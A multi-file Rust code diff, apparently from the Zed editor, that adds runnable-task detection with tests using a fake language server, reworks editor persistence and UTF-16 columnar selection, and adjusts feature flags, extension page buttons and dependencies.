+ let language = runnable.language.clone();
+ cx.spawn(async move |cx| {
+ let mut templates_with_tags = Vec::new();
+ if let Some(inventory) = inventory {
+ for RunnableTag(tag) in tags {
+ let new_tasks = inventory.update(cx, |inventory, cx| {
+ inventory.list_tasks(file.clone(), Some(language.clone()), worktree_id, cx)
+ });
+ templates_with_tags.extend(new_tasks.await.into_iter().filter(
+ move |(_, template)| {
+ template.tags.iter().any(|source_tag| source_tag == &tag)
+ },
+ ));
+ }
+ }
+ templates_with_tags.sort_by_key(|(kind, _)| kind.to_owned());
+
+ if let Some((leading_tag_source, _)) = templates_with_tags.first() {
+ // Strongest source wins; if we have worktree tag binding, prefer that to
+ // global and language bindings;
+ // if we have a global binding, prefer that to language binding.
+ let first_mismatch = templates_with_tags
+ .iter()
+ .position(|(tag_source, _)| tag_source != leading_tag_source);
+ if let Some(index) = first_mismatch {
+ templates_with_tags.truncate(index);
+ }
+ }
+
+ templates_with_tags
+ })
+ }
+
+ fn find_closest_task(
+ &mut self,
+ cx: &mut Context<Self>,
+ ) -> Option<(Entity<Buffer>, u32, Arc<RunnableTasks>)> {
+ let cursor_row = self
+ .selections
+ .newest_adjusted(&self.display_snapshot(cx))
+ .head()
+ .row;
+
+ let ((buffer_id, row), tasks) = self
+ .runnables
+ .runnables
+ .iter()
+ .flat_map(|(buffer_id, (_, tasks))| {
+ tasks.iter().map(|(row, tasks)| ((*buffer_id, *row), tasks))
+ })
+ .min_by_key(|((_, row), _)| cursor_row.abs_diff(*row))?;
+
+ let buffer = self.buffer.read(cx).buffer(buffer_id)?;
+ let tasks = Arc::new(tasks.to_owned());
+ Some((buffer, row, tasks))
+ }
+}
+
+#[cfg(test)]
+mod tests {
+ use std::{sync::Arc, time::Duration};
+
+ use futures::StreamExt as _;
+ use gpui::{AppContext as _, Task, TestAppContext};
+ use indoc::indoc;
+ use language::{ContextProvider, FakeLspAdapter};
+ use languages::rust_lang;
+ use lsp::LanguageServerName;
+ use multi_buffer::{MultiBuffer, PathKey};
+ use project::{
+ FakeFs, Project,
+ lsp_store::lsp_ext_command::{CargoRunnableArgs, Runnable, RunnableArgs, RunnableKind},
+ };
+ use serde_json::json;
+ use task::{TaskTemplate, TaskTemplates};
+ use text::Point;
+ use util::path;
+
+ use crate::{
+ Editor, UPDATE_DEBOUNCE, editor_tests::init_test, scroll::scroll_amount::ScrollAmount,
+ test::build_editor_with_project,
+ };
+
+ const FAKE_LSP_NAME: &str = "the-fake-language-server";
+
+ struct TestRustContextProvider;
+
+ impl ContextProvider for TestRustContextProvider {
+ fn associated_tasks(
+ &self,
+ _: Option<Arc<dyn language::File>>,
+ _: &gpui::App,
+ ) -> Task<Option<TaskTemplates>> {
+ Task::ready(Some(TaskTemplates(vec![
+ TaskTemplate {
+ label: "Run main".into(),
+ command: "cargo".into(),
+ args: vec!["run".into()],
+ tags: vec!["rust-main".into()],
+ ..TaskTemplate::default()
+ },
+ TaskTemplate {
+ label: "Run test".into(),
+ command: "cargo".into(),
+ args: vec!["test".into()],
+ tags: vec!["rust-test".into()],
+ ..TaskTemplate::default()
+ },
+ ])))
+ }
+ }
+
+ struct TestRustContextProviderWithLsp;
+
+ impl ContextProvider for TestRustContextProviderWithLsp {
+ fn associated_tasks(
+ &self,
+ _: Option<Arc<dyn language::File>>,
+ _: &gpui::App,
+ ) -> Task<Option<TaskTemplates>> {
+ Task::ready(Some(TaskTemplates(vec![TaskTemplate {
+ label: "Run test".into(),
+ command: "cargo".into(),
+ args: vec!["test".into()],
+ tags: vec!["rust-test".into()],
+ ..TaskTemplate::default()
+ }])))
+ }
+
+ fn lsp_task_source(&self) -> Option<LanguageServerName> {
+ Some(LanguageServerName::new_static(FAKE_LSP_NAME))
+ }
+ }
+
+ fn rust_lang_with_task_context() -> Arc<language::Language> {
+ Arc::new(
+ Arc::try_unwrap(rust_lang())
+ .unwrap()
+ .with_context_provider(Some(Arc::new(TestRustContextProvider))),
+ )
+ }
+
+ fn rust_lang_with_lsp_task_context() -> Arc<language::Language> {
+ Arc::new(
+ Arc::try_unwrap(rust_lang())
+ .unwrap()
+ .with_context_provider(Some(Arc::new(TestRustContextProviderWithLsp))),
+ )
+ }
+
+ fn collect_runnable_labels(
+ editor: &Editor,
+ ) -> Vec<(text::BufferId, language::BufferRow, Vec<String>)> {
+ let mut result = editor
+ .runnables
+ .runnables
+ .iter()
+ .flat_map(|(buffer_id, (_, tasks))| {
+ tasks.iter().map(move |(row, runnable_tasks)| {
+ let mut labels: Vec<String> = runnable_tasks
+ .templates
+ .iter()
+ .map(|(_, template)| template.label.clone())
+ .collect();
+ labels.sort();
+ (*buffer_id, *row, labels)
+ })
+ })
+ .collect::<Vec<_>>();
+ result.sort_by_key(|(id, row, _)| (*id, *row));
+ result
+ }
+
+ #[gpui::test]
+ async fn test_multi_buffer_runnables_on_scroll(cx: &mut TestAppContext) {
+ init_test(cx, |_| {});
+
+ let padding_lines = 50;
+ let mut first_rs = String::from("fn main() {\n println!(\"hello\");\n}\n");
+ for _ in 0..padding_lines {
+ first_rs.push_str("//\n");
+ }
+ let test_one_row = 3 + padding_lines as u32 + 1;
+ first_rs.push_str("#[test]\nfn test_one() {\n assert!(true);\n}\n");
+
+ let fs = FakeFs::new(cx.executor());
+ fs.insert_tree(
+ path!("/project"),
+ json!({
+ "first.rs": first_rs,
+ "second.rs": indoc! {"
+ #[test]
+ fn test_two() {
+ assert!(true);
+ }
+
+ #[test]
+ fn test_three() {
+ assert!(true);
+ }
+ "},
+ }),
+ )
+ .await;
+
+ let project = Project::test(fs, [path!("/project").as_ref()], cx).await;
+ let language_registry = project.read_with(cx, |project, _| project.languages().clone());
+ language_registry.add(rust_lang_with_task_context());
+
+ let buffer_1 = project
+ .update(cx, |project, cx| {
+ project.open_local_buffer(path!("/project/first.rs"), cx)
+ })
+ .await
+ .unwrap();
+ let buffer_2 = project
+ .update(cx, |project, cx| {
+ project.open_local_buffer(path!("/project/second.rs"), cx)
+ })
+ .await
+ .unwrap();
+
+ let buffer_1_id = buffer_1.read_with(cx, |buffer, _| buffer.remote_id());
+ let buffer_2_id = buffer_2.read_with(cx, |buffer, _| buffer.remote_id());
+
+ let multi_buffer = cx.new(|cx| {
+ let mut multi_buffer = MultiBuffer::new(language::Capability::ReadWrite);
+ let end = buffer_1.read(cx).max_point();
+ multi_buffer.set_excerpts_for_path(
+ PathKey::sorted(0),
+ buffer_1.clone(),
+ [Point::new(0, 0)..end],
+ 0,
+ cx,
+ );
+ multi_buffer.set_excerpts_for_path(
+ PathKey::sorted(1),
+ buffer_2.clone(),
+ [Point::new(0, 0)..Point::new(8, 1)],
+ 0,
+ cx,
+ );
+ multi_buffer
+ });
+
+ let editor = cx.add_window(|window, cx| {
+ Editor::for_multibuffer(multi_buffer, Some(project.clone()), window, cx)
+ });
+ cx.executor().advance_clock(Duration::from_millis(500));
+ cx.executor().run_until_parked();
+
+ // Clear stale data from startup events, then refresh.
+ // first.rs is long enough that second.rs is below the ~47-line viewport.
+ editor
+ .update(cx, |editor, window, cx| {
+ editor.clear_runnables(None);
+ editor.refresh_runnables(None, window, cx);
+ })
+ .unwrap();
+ cx.executor().advance_clock(UPDATE_DEBOUNCE);
+ cx.executor().run_until_parked();
+ assert_eq!(
+ editor
+ .update(cx, |editor, _, _| collect_runnable_labels(editor))
+ .unwrap(),
+ vec![(buffer_1_id, 0, vec!["Run main".to_string()])],
+ "Only fn main from first.rs should be visible before scrolling"
+ );
+
+ // Scroll down to bring second.rs excerpts into view.
+ editor
+ .update(cx, |editor, window, cx| {
+ editor.scroll_screen(&ScrollAmount::Page(1.0), window, cx);
+ })
+ .unwrap();
+ cx.executor().advance_clock(Duration::from_millis(200));
+ cx.executor().run_until_parked();
+
+ let after_scroll = editor
+ .update(cx, |editor, _, _| collect_runnable_labels(editor))
+ .unwrap();
+ assert_eq!(
+ after_scroll,
+ vec![
+ (buffer_1_id, 0, vec!["Run main".to_string()]),
+ (buffer_1_id, test_one_row, vec!["Run test".to_string()]),
+ (buffer_2_id, 1, vec!["Run test".to_string()]),
+ (buffer_2_id, 6, vec!["Run test".to_string()]),
+ ],
+ "Tree-sitter should detect both #[test] fns in second.rs after scroll"
+ );
+
+ // Edit second.rs to invalidate its cache; first.rs data should persist.
+ buffer_2.update(cx, |buffer, cx| {
+ buffer.edit([(0..0, "// added comment\n")], None, cx);
+ });
+ editor
+ .update(cx, |editor, window, cx| {
+ editor.scroll_screen(&ScrollAmount::Page(-1.0), window, cx);
+ })
+ .unwrap();
+ cx.executor().advance_clock(Duration::from_millis(200));
+ cx.executor().run_until_parked();
+
+ assert_eq!(
+ editor
+ .update(cx, |editor, _, _| collect_runnable_labels(editor))
+ .unwrap(),
+ vec![
+ (buffer_1_id, 0, vec!["Run main".to_string()]),
+ (buffer_1_id, test_one_row, vec!["Run test".to_string()]),
+ ],
+ "first.rs runnables should survive an edit to second.rs"
+ );
+ }
+
+ #[gpui::test]
+ async fn test_lsp_runnables_removed_after_edit(cx: &mut TestAppContext) {
+ init_test(cx, |_| {});
+
+ let fs = FakeFs::new(cx.executor());
+ fs.insert_tree(
+ path!("/project"),
+ json!({
+ "main.rs": indoc! {"
+ #[test]
+ fn test_one() {
+ assert!(true);
+ }
+
+ fn helper() {}
+ "},
+ }),
+ )
+ .await;
+
+ let project = Project::test(fs, [path!("/project").as_ref()], cx).await;
+ let language_registry = project.read_with(cx, |project, _| project.languages().clone());
+ language_registry.add(rust_lang_with_lsp_task_context());
+
+ let mut fake_servers = language_registry.register_fake_lsp(
+ "Rust",
+ FakeLspAdapter {
+ name: FAKE_LSP_NAME,
+ ..FakeLspAdapter::default()
+ },
+ );
+
+ let buffer = project
+ .update(cx, |project, cx| {
+ project.open_local_buffer(path!("/project/main.rs"), cx)
+ })
+ .await
+ .unwrap();
+
+ let buffer_id = buffer.read_with(cx, |buffer, _| buffer.remote_id());
+
+ let multi_buffer = cx.new(|cx| MultiBuffer::singleton(buffer.clone(), cx));
+ let editor = cx.add_window(|window, cx| {
+ build_editor_with_project(project.clone(), multi_buffer, window, cx)
+ });
+
+ let fake_server = fake_servers.next().await.expect("fake LSP server");
+
+ use project::lsp_store::lsp_ext_command::Runnables;
+ fake_server.set_request_handler::<Runnables, _, _>(move |params, _| async move {
+ let text = params.text_document.uri.path().to_string();
+ if text.contains("main.rs") {
+ let uri = lsp::Uri::from_file_path(path!("/project/main.rs")).expect("valid uri");
+ Ok(vec![Runnable {
+ label: "LSP test_one".into(),
+ location: Some(lsp::LocationLink {
+ origin_selection_range: None,
+ target_uri: uri,
+ target_range: lsp::Range::new(
+ lsp::Position::new(0, 0),
+ lsp::Position::new(3, 1),
+ ),
+ target_selection_range: lsp::Range::new(
+ lsp::Position::new(0, 0),
+ lsp::Position::new(3, 1),
+ ),
+ }),
+ kind: RunnableKind::Cargo,
+ args: RunnableArgs::Cargo(CargoRunnableArgs {
+ environment: Default::default(),
+ cwd: path!("/project").into(),
+ override_cargo: None,
+ workspace_root: None,
+ cargo_args: vec!["test".into(), "test_one".into()],
+ executable_args: Vec::new(),
+ }),
+ }])
+ } else {
+ Ok(Vec::new())
+ }
+ });
+
+ // Trigger a refresh to pick up both tree-sitter and LSP runnables.
+ editor
+ .update(cx, |editor, window, cx| {
+ editor.refresh_runnables(None, window, cx);
+ })
+ .expect("editor update");
+ cx.executor().advance_clock(UPDATE_DEBOUNCE);
+ cx.executor().run_until_parked();
+
+ let labels = editor
+ .update(cx, |editor, _, _| collect_runnable_labels(editor))
+ .expect("editor update");
+ assert_eq!(
+ labels,
+ vec![(buffer_id, 0, vec!["LSP test_one".to_string()]),],
+ "LSP runnables should appear for #[test] fn"
+ );
+
+ // Remove `#[test]` attribute so the function is no longer a test.
+ buffer.update(cx, |buffer, cx| {
+ let test_attr_end = buffer.text().find("\nfn test_one").expect("find fn");
+ buffer.edit([(0..test_attr_end, "")], None, cx);
+ });
+
+ // Also update the LSP handler to return no runnables.
+ fake_server
+ .set_request_handler::<Runnables, _, _>(move |_, _| async move { Ok(Vec::new()) });
+
+ cx.executor().advance_clock(UPDATE_DEBOUNCE);
+ cx.executor().run_until_parked();
+
+ let labels = editor
+ .update(cx, |editor, _, _| collect_runnable_labels(editor))
+ .expect("editor update");
+ assert_eq!(
+ labels,
+ Vec::<(text::BufferId, language::BufferRow, Vec<String>)>::new(),
+ "Runnables should be removed after #[test] is deleted and LSP returns empty"
+ );
+ }
+}
@@ -8,7 +8,7 @@ use crate::{
InlayHintRefreshReason, MultiBufferSnapshot, RowExt, ToPoint,
display_map::{DisplaySnapshot, ToDisplayPoint},
hover_popover::hide_hover,
- persistence::DB,
+ persistence::EditorDb,
};
pub use autoscroll::{Autoscroll, AutoscrollStrategy};
use core::fmt::Debug;
@@ -467,12 +467,13 @@ impl ScrollManager {
let item_id = cx.entity().entity_id().as_u64() as ItemId;
let executor = cx.background_executor().clone();
+ let db = EditorDb::global(cx);
self._save_scroll_position_task = cx.background_executor().spawn(async move {
executor.timer(Duration::from_millis(10)).await;
log::debug!(
"Saving scroll position for item {item_id:?} in workspace {workspace_id:?}"
);
- DB.save_scroll_position(
+ db.save_scroll_position(
item_id,
workspace_id,
top_row,
@@ -937,7 +938,7 @@ impl Editor {
window: &mut Window,
cx: &mut Context<Editor>,
) {
- let scroll_position = DB.get_scroll_position(item_id, workspace_id);
+ let scroll_position = EditorDb::global(cx).get_scroll_position(item_id, workspace_id);
if let Ok(Some((top_row, x, y))) = scroll_position {
let top_anchor = self
.buffer()
@@ -7,7 +7,7 @@ use std::{
use collections::HashMap;
use gpui::Pixels;
use itertools::Itertools as _;
-use language::{Bias, Point, Selection, SelectionGoal};
+use language::{Bias, Point, PointUtf16, Selection, SelectionGoal};
use multi_buffer::{MultiBufferDimension, MultiBufferOffset};
use util::post_inc;
@@ -408,11 +408,11 @@ impl SelectionsCollection {
}
/// Attempts to build a selection in the provided buffer row using the
- /// same buffer column range as specified.
+ /// same UTF-16 column range as specified.
/// Returns `None` if the range is not empty but it starts past the line's
/// length, meaning that the line isn't long enough to be contained within
/// part of the provided range.
- pub fn build_columnar_selection_from_buffer_columns(
+ fn build_columnar_selection_from_utf16_columns(
&mut self,
display_map: &DisplaySnapshot,
buffer_row: u32,
@@ -420,23 +420,22 @@ impl SelectionsCollection {
reversed: bool,
text_layout_details: &TextLayoutDetails,
) -> Option<Selection<Point>> {
+ let snapshot = display_map.buffer_snapshot();
let is_empty = positions.start == positions.end;
- let line_len = display_map
- .buffer_snapshot()
- .line_len(multi_buffer::MultiBufferRow(buffer_row));
+ let line_len_utf16 = snapshot.line_len_utf16(multi_buffer::MultiBufferRow(buffer_row));
let (start, end) = if is_empty {
- let column = std::cmp::min(positions.start, line_len);
- let point = Point::new(buffer_row, column);
+ let column = std::cmp::min(positions.start, line_len_utf16);
+ let point = snapshot.point_utf16_to_point(PointUtf16::new(buffer_row, column));
(point, point)
} else {
- if positions.start >= line_len {
+ if positions.start >= line_len_utf16 {
return None;
}
- let start = Point::new(buffer_row, positions.start);
- let end_column = std::cmp::min(positions.end, line_len);
- let end = Point::new(buffer_row, end_column);
+ let start = snapshot.point_utf16_to_point(PointUtf16::new(buffer_row, positions.start));
+ let end_column = std::cmp::min(positions.end, line_len_utf16);
+ let end = snapshot.point_utf16_to_point(PointUtf16::new(buffer_row, end_column));
(start, end)
};
@@ -510,7 +509,7 @@ impl SelectionsCollection {
row = new_row.row();
let buffer_row = new_row.to_point(display_map).row;
- if let Some(selection) = self.build_columnar_selection_from_buffer_columns(
+ if let Some(selection) = self.build_columnar_selection_from_utf16_columns(
display_map,
buffer_row,
goal_columns,
@@ -119,7 +119,7 @@ impl Editor {
for_server: Option<RefreshForServer>,
cx: &mut Context<Self>,
) {
- if !self.mode().is_full() || !self.semantic_token_state.enabled() {
+ if !self.lsp_data_enabled() || !self.semantic_token_state.enabled() {
self.invalidate_semantic_tokens(None);
self.display_map.update(cx, |display_map, _| {
match Arc::get_mut(&mut display_map.semantic_token_highlights) {
@@ -6,9 +6,11 @@ use std::{
use buffer_diff::{BufferDiff, BufferDiffSnapshot};
use collections::HashMap;
-use gpui::{Action, AppContext as _, Entity, EventEmitter, Focusable, Subscription, WeakEntity};
+use gpui::{
+ Action, AppContext as _, Entity, EventEmitter, Focusable, Font, Subscription, WeakEntity,
+};
use itertools::Itertools;
-use language::{Buffer, Capability};
+use language::{Buffer, Capability, HighlightedText};
use multi_buffer::{
Anchor, BufferOffset, ExcerptId, ExcerptRange, ExpandExcerptDirection, MultiBuffer,
MultiBufferDiffHunk, MultiBufferPoint, MultiBufferSnapshot, PathKey,
@@ -29,7 +31,7 @@ use crate::{
};
use workspace::{
ActivatePaneLeft, ActivatePaneRight, Item, ToolbarItemLocation, Workspace,
- item::{BreadcrumbText, ItemBufferKind, ItemEvent, SaveOptions, TabContentParams},
+ item::{ItemBufferKind, ItemEvent, SaveOptions, TabContentParams},
searchable::{SearchEvent, SearchToken, SearchableItem, SearchableItemHandle},
};
@@ -446,6 +448,9 @@ impl SplittableEditor {
let mut editor =
Editor::for_multibuffer(rhs_multibuffer.clone(), Some(project.clone()), window, cx);
editor.set_expand_all_diff_hunks(cx);
+ editor.disable_runnables();
+ editor.disable_diagnostics(cx);
+ editor.set_minimap_visibility(crate::MinimapVisibility::Disabled, window, cx);
editor
});
// TODO(split-diff) we might want to tag editor events with whether they came from rhs/lhs
@@ -1850,7 +1855,7 @@ impl Item for SplittableEditor {
self.rhs_editor.read(cx).breadcrumb_location(cx)
}
- fn breadcrumbs(&self, cx: &App) -> Option<Vec<BreadcrumbText>> {
+ fn breadcrumbs(&self, cx: &App) -> Option<(Vec<HighlightedText>, Option<Font>)> {
self.rhs_editor.read(cx).breadcrumbs(cx)
}
@@ -1,110 +0,0 @@
-use crate::Editor;
-
-use collections::HashMap;
-use gpui::{App, Task, Window};
-use lsp::LanguageServerName;
-use project::{Location, project_settings::ProjectSettings};
-use settings::Settings as _;
-use task::{TaskContext, TaskVariables, VariableName};
-use text::{BufferId, ToOffset, ToPoint};
-
-impl Editor {
- pub fn task_context(&self, window: &mut Window, cx: &mut App) -> Task<Option<TaskContext>> {
- let Some(project) = self.project.clone() else {
- return Task::ready(None);
- };
- let (selection, buffer, editor_snapshot) = {
- let selection = self.selections.newest_adjusted(&self.display_snapshot(cx));
- let Some((buffer, _)) = self
- .buffer()
- .read(cx)
- .point_to_buffer_offset(selection.start, cx)
- else {
- return Task::ready(None);
- };
- let snapshot = self.snapshot(window, cx);
- (selection, buffer, snapshot)
- };
- let selection_range = selection.range();
- let start = editor_snapshot
- .display_snapshot
- .buffer_snapshot()
- .anchor_after(selection_range.start)
- .text_anchor;
- let end = editor_snapshot
- .display_snapshot
- .buffer_snapshot()
- .anchor_after(selection_range.end)
- .text_anchor;
- let location = Location {
- buffer,
- range: start..end,
- };
- let captured_variables = {
- let mut variables = TaskVariables::default();
- let buffer = location.buffer.read(cx);
- let buffer_id = buffer.remote_id();
- let snapshot = buffer.snapshot();
- let starting_point = location.range.start.to_point(&snapshot);
- let starting_offset = starting_point.to_offset(&snapshot);
- for (_, tasks) in self
- .tasks
- .range((buffer_id, 0)..(buffer_id, starting_point.row + 1))
- {
- if !tasks
- .context_range
- .contains(&crate::BufferOffset(starting_offset))
- {
- continue;
- }
- for (capture_name, value) in tasks.extra_variables.iter() {
- variables.insert(
- VariableName::Custom(capture_name.to_owned().into()),
- value.clone(),
- );
- }
- }
- variables
- };
-
- project.update(cx, |project, cx| {
- project.task_store().update(cx, |task_store, cx| {
- task_store.task_context_for_location(captured_variables, location, cx)
- })
- })
- }
-
- pub fn lsp_task_sources(&self, cx: &App) -> HashMap<LanguageServerName, Vec<BufferId>> {
- let lsp_settings = &ProjectSettings::get_global(cx).lsp;
-
- self.buffer()
- .read(cx)
- .all_buffers()
- .into_iter()
- .filter_map(|buffer| {
- let lsp_tasks_source = buffer
- .read(cx)
- .language()?
- .context_provider()?
- .lsp_task_source()?;
- if lsp_settings
- .get(&lsp_tasks_source)
- .is_none_or(|s| s.enable_lsp_tasks)
- {
- let buffer_id = buffer.read(cx).remote_id();
- Some((lsp_tasks_source, buffer_id))
- } else {
- None
- }
- })
- .fold(
- HashMap::default(),
- |mut acc, (lsp_task_source, buffer_id)| {
- acc.entry(lsp_task_source)
- .or_insert_with(Vec::new)
- .push(buffer_id);
- acc
- },
- )
- }
-}
@@ -328,6 +328,9 @@ impl ExampleContext {
"{}Bug: Tool confirmation should not be required in eval",
log_prefix
),
+ ThreadEvent::Plan(plan) => {
+ println!("{log_prefix} Got plan: {plan:?}");
+ }
ThreadEvent::SubagentSpawned(session) => {
println!("{log_prefix} Got subagent spawn: {session:?}");
}
@@ -50,6 +50,7 @@ use gpui::{AppContext as _, AsyncApp, Entity, UpdateGlobal};
use language_model::{LanguageModelRegistry, SelectedModel};
use project::Project;
use settings::SettingsStore;
+use util::path_list::PathList;
use crate::headless::AgentCliAppState;
@@ -357,24 +358,24 @@ async fn run_agent(
Err(e) => return (Err(e), None),
};
- let thread_store = cx.new(|cx| ThreadStore::new(cx));
- let agent = match NativeAgent::new(
- project.clone(),
- thread_store,
- Templates::new(),
- None,
- app_state.fs.clone(),
- cx,
- )
- .await
- {
- Ok(a) => a,
- Err(e) => return (Err(e).context("creating agent"), None),
- };
+ let agent = cx.update(|cx| {
+ let thread_store = cx.new(|cx| ThreadStore::new(cx));
+ NativeAgent::new(
+ thread_store,
+ Templates::new(),
+ None,
+ app_state.fs.clone(),
+ cx,
+ )
+ });
let connection = Rc::new(NativeAgentConnection(agent.clone()));
let acp_thread = match cx
- .update(|cx| connection.clone().new_session(project, workdir, cx))
+ .update(|cx| {
+ connection
+ .clone()
+ .new_session(project, PathList::new(&[workdir]), cx)
+ })
.await
{
Ok(t) => t,
@@ -11,7 +11,6 @@ use std::sync::Arc;
use ::lsp::LanguageServerName;
use anyhow::{Context as _, Result, bail};
use async_trait::async_trait;
-use fs::normalize_path;
use gpui::{App, Task};
use language::LanguageName;
use semver::Version;
@@ -57,7 +56,7 @@ pub trait Extension: Send + Sync + 'static {
/// Returns a path relative to this extension's working directory.
fn path_from_extension(&self, path: &Path) -> PathBuf {
- normalize_path(&self.work_dir().join(path))
+ util::normalize_path(&self.work_dir().join(path))
}
async fn language_server_command(
@@ -1,12 +1,13 @@
use std::collections::HashMap;
use std::sync::{Arc, OnceLock};
-use db::kvp::KEY_VALUE_STORE;
+use db::kvp::KeyValueStore;
use editor::Editor;
use extension_host::ExtensionStore;
use gpui::{AppContext as _, Context, Entity, SharedString, Window};
use language::Buffer;
use ui::prelude::*;
+use util::ResultExt;
use util::rel_path::RelPath;
use workspace::notifications::simple_message_notification::MessageNotification;
use workspace::{Workspace, notifications::NotificationId};
@@ -147,7 +148,8 @@ pub(crate) fn suggest(buffer: Entity<Buffer>, window: &mut Window, cx: &mut Cont
};
let key = language_extension_key(&extension_id);
- let Ok(None) = KEY_VALUE_STORE.read_kvp(&key) else {
+ let kvp = KeyValueStore::global(cx);
+ let Ok(None) = kvp.read_kvp(&key) else {
return;
};
@@ -193,9 +195,11 @@ pub(crate) fn suggest(buffer: Entity<Buffer>, window: &mut Window, cx: &mut Cont
.secondary_icon_color(Color::Error)
.secondary_on_click(move |_window, cx| {
let key = language_extension_key(&extension_id);
- db::write_and_log(cx, move || {
- KEY_VALUE_STORE.write_kvp(key, "dismissed".to_string())
- });
+ let kvp = KeyValueStore::global(cx);
+ cx.background_spawn(async move {
+ kvp.write_kvp(key, "dismissed".to_string()).await.log_err()
+ })
+ .detach();
})
})
});
@@ -1056,10 +1056,11 @@ impl ExtensionsPage {
"Install",
)
.style(ButtonStyle::Tinted(ui::TintColor::Accent))
- .icon(IconName::Download)
- .icon_size(IconSize::Small)
- .icon_color(Color::Muted)
- .icon_position(IconPosition::Start)
+ .start_icon(
+ Icon::new(IconName::Download)
+ .size(IconSize::Small)
+ .color(Color::Muted),
+ )
.on_click({
let extension_id = extension.id.clone();
move |_, _, cx| {
@@ -1078,10 +1079,11 @@ impl ExtensionsPage {
"Install",
)
.style(ButtonStyle::Tinted(ui::TintColor::Accent))
- .icon(IconName::Download)
- .icon_size(IconSize::Small)
- .icon_color(Color::Muted)
- .icon_position(IconPosition::Start)
+ .start_icon(
+ Icon::new(IconName::Download)
+ .size(IconSize::Small)
+ .color(Color::Muted),
+ )
.disabled(true),
configure: None,
upgrade: None,
@@ -1479,10 +1481,11 @@ impl ExtensionsPage {
}
});
let open_registry_button = Button::new("open_registry", "Learn More")
- .icon(IconName::ArrowUpRight)
- .icon_size(IconSize::Small)
- .icon_position(IconPosition::End)
- .icon_color(Color::Muted)
+ .end_icon(
+ Icon::new(IconName::ArrowUpRight)
+ .size(IconSize::Small)
+ .color(Color::Muted),
+ )
.on_click({
move |_event, _window, cx| {
telemetry::event!(
@@ -1520,9 +1523,7 @@ impl ExtensionsPage {
cx: &mut Context<Self>,
) -> impl IntoElement {
let docs_url_button = Button::new("open_docs", "View Documentation")
- .icon(IconName::ArrowUpRight)
- .icon_size(IconSize::Small)
- .icon_position(IconPosition::End)
+ .end_icon(Icon::new(IconName::ArrowUpRight).size(IconSize::Small))
.on_click({
move |_event, _window, cx| {
telemetry::event!(
@@ -12,5 +12,4 @@ workspace = true
path = "src/feature_flags.rs"
[dependencies]
-futures.workspace = true
gpui.workspace = true
@@ -3,12 +3,8 @@ mod flags;
use std::cell::RefCell;
use std::rc::Rc;
use std::sync::LazyLock;
-use std::time::Duration;
-use std::{future::Future, pin::Pin, task::Poll};
-use futures::channel::oneshot;
-use futures::{FutureExt, select_biased};
-use gpui::{App, Context, Global, Subscription, Task, Window};
+use gpui::{App, Context, Global, Subscription, Window};
pub use flags::*;
@@ -122,11 +118,6 @@ pub struct OnFlagsReady {
}
pub trait FeatureFlagAppExt {
- fn wait_for_flag<T: FeatureFlag>(&mut self) -> WaitForFlag;
-
- /// Waits for the specified feature flag to resolve, up to the given timeout.
- fn wait_for_flag_or_timeout<T: FeatureFlag>(&mut self, timeout: Duration) -> Task<bool>;
-
fn update_flags(&mut self, staff: bool, flags: Vec<String>);
fn set_staff(&mut self, staff: bool);
fn has_flag<T: FeatureFlag>(&self) -> bool;
@@ -192,54 +183,4 @@ impl FeatureFlagAppExt for App {
callback(feature_flags.has_flag::<T>(), cx);
})
}
-
- fn wait_for_flag<T: FeatureFlag>(&mut self) -> WaitForFlag {
- let (tx, rx) = oneshot::channel::<bool>();
- let mut tx = Some(tx);
- let subscription: Option<Subscription>;
-
- match self.try_global::<FeatureFlags>() {
- Some(feature_flags) => {
- subscription = None;
- tx.take().unwrap().send(feature_flags.has_flag::<T>()).ok();
- }
- None => {
- subscription = Some(self.observe_global::<FeatureFlags>(move |cx| {
- let feature_flags = cx.global::<FeatureFlags>();
- if let Some(tx) = tx.take() {
- tx.send(feature_flags.has_flag::<T>()).ok();
- }
- }));
- }
- }
-
- WaitForFlag(rx, subscription)
- }
-
- fn wait_for_flag_or_timeout<T: FeatureFlag>(&mut self, timeout: Duration) -> Task<bool> {
- let wait_for_flag = self.wait_for_flag::<T>();
-
- self.spawn(async move |cx| {
- let mut wait_for_flag = wait_for_flag.fuse();
- let mut timeout = FutureExt::fuse(cx.background_executor().timer(timeout));
-
- select_biased! {
- is_enabled = wait_for_flag => is_enabled,
- _ = timeout => false,
- }
- })
- }
-}
-
-pub struct WaitForFlag(oneshot::Receiver<bool>, Option<Subscription>);
-
-impl Future for WaitForFlag {
- type Output = bool;
-
- fn poll(mut self: Pin<&mut Self>, cx: &mut core::task::Context<'_>) -> Poll<Self::Output> {
- self.0.poll_unpin(cx).map(|result| {
- self.1.take();
- result.unwrap_or(false)
- })
- }
}
@@ -62,3 +62,23 @@ impl FeatureFlag for StreamingEditFileToolFeatureFlag {
true
}
}
+
+pub struct UpdatePlanToolFeatureFlag;
+
+impl FeatureFlag for UpdatePlanToolFeatureFlag {
+ const NAME: &'static str = "update-plan-tool";
+
+ fn enabled_for_staff() -> bool {
+ true
+ }
+}
+
+pub struct ProjectPanelUndoRedoFeatureFlag;
+
+impl FeatureFlag for ProjectPanelUndoRedoFeatureFlag {
+ const NAME: &'static str = "project-panel-undo-redo";
+
+ fn enabled_for_staff() -> bool {
+ false
+ }
+}
@@ -14,6 +14,8 @@ doctest = false
[dependencies]
anyhow.workspace = true
+channel.workspace = true
+client.workspace = true
collections.workspace = true
editor.workspace = true
file_icons.workspace = true
@@ -26,7 +28,6 @@ picker.workspace = true
project.workspace = true
settings.workspace = true
serde.workspace = true
-text.workspace = true
theme.workspace = true
ui.workspace = true
util.workspace = true
@@ -45,3 +46,4 @@ serde_json.workspace = true
theme = { workspace = true, features = ["test-support"] }
workspace = { workspace = true, features = ["test-support"] }
zlog.workspace = true
+remote_connection = { workspace = true, features = ["test-support"] }
@@ -4,10 +4,12 @@ mod file_finder_tests;
use futures::future::join_all;
pub use open_path_prompt::OpenPathDelegate;
+use channel::ChannelStore;
+use client::ChannelId;
use collections::HashMap;
use editor::Editor;
use file_icons::FileIcons;
-use fuzzy::{CharBag, PathMatch, PathMatchCandidate};
+use fuzzy::{CharBag, PathMatch, PathMatchCandidate, StringMatch, StringMatchCandidate};
use gpui::{
Action, AnyElement, App, Context, DismissEvent, Entity, EventEmitter, FocusHandle, Focusable,
KeyContext, Modifiers, ModifiersChangedEvent, ParentElement, Render, Styled, Task, WeakEntity,
@@ -33,7 +35,6 @@ use std::{
atomic::{self, AtomicBool},
},
};
-use text::Point;
use ui::{
ButtonLike, ContextMenu, HighlightedLabel, Indicator, KeyBinding, ListItem, ListItemSpacing,
PopoverMenu, PopoverMenuHandle, TintColor, Tooltip, prelude::*,
@@ -45,8 +46,8 @@ use util::{
